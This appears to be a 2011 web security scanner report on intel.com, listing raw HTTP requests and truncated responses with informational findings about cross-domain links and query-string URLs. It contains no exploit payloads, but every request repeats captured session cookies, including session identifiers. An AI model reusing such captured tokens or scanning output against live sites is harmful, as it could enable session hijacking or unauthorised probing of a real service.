HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:25 GMT Content-Length: 29230 Connection: close
<!DOCTYPE html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <!-- DOC-FACTORY Generated Tags BEGIN --> <title>Motherboards from ...[SNIP]... <li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a> ...[SNIP]... <li><a href="http://www.intelbettertogether.com/"><strong> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /products/processor/index.htm?iid=gg_prod-en_US+procs HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40629
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /reseller/index.htm?iid=subhdr+ptr_chan_reseller HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:58 GMT Content-Length: 29032 Connection: close
<HTML> <HEAD> <!-- DOC-FACTORY Generated Tags BEGIN --> <TITLE>Intel® Reseller Center Region Selector</TITLE> <meta name = "creation_date" content = "22-Jun-07"> <meta name = "stop_date" con ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /shop?iid=gg_prod-en_US+cons_shop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:20:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=jQqtNNbNTmjhlWb9JmYNf38R1LKMJlP6tfzhjJGvPDXGHy8G4vD2!1651646670; path=/; HttpOnly= Content-Length: 39887
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /shop/desktops?iid=subhdr+shop_desktop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:21:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=ZDpJNNbb4GjTQpTRCyZYTNnWT8nZ2TJPNGpDLSBxZqXJv2TqGrbP!-824261870; path=/; HttpOnly= Content-Length: 748617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /shop/laptops?iid=subhdr+shop_notebook HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:20:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=zCWpNNbbfj2TPP5WPQLRJdYMHz64JZTNhRVDR2GspJGQv5dLhJrB!-824261870; path=/; HttpOnly= Content-Length: 606349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /shop/netbooks?iid=subhdr+shop_intdev HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:21:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=Ck1WNNbcJjFbVrvJt6WS5Gs0tpTc29Lncf1LHR3vj4k6TgQpLTvM!-280077424; path=/; HttpOnly= Content-Length: 105032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The page was loaded from a URL containing a query string:
http://www.intel.com/siteindex.htm?iid=ftr+map
The response contains the following links to other domains:
http://www.intc.com/
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /siteindex.htm?iid=ftr+map HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <title>Intel Corporation - U.S. Site Index</title> <meta ...[SNIP]... <li><a href="http://www.intc.com" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=siteindex+companyinfo_invest');">Investor Relations</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:17:53 GMT Content-Length: 28251 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <title>Intel® Online Privacy Notice Summary</title> <me ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:17:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60605
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <title>Intel® Terms of Use</title> <meta http-eq ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; 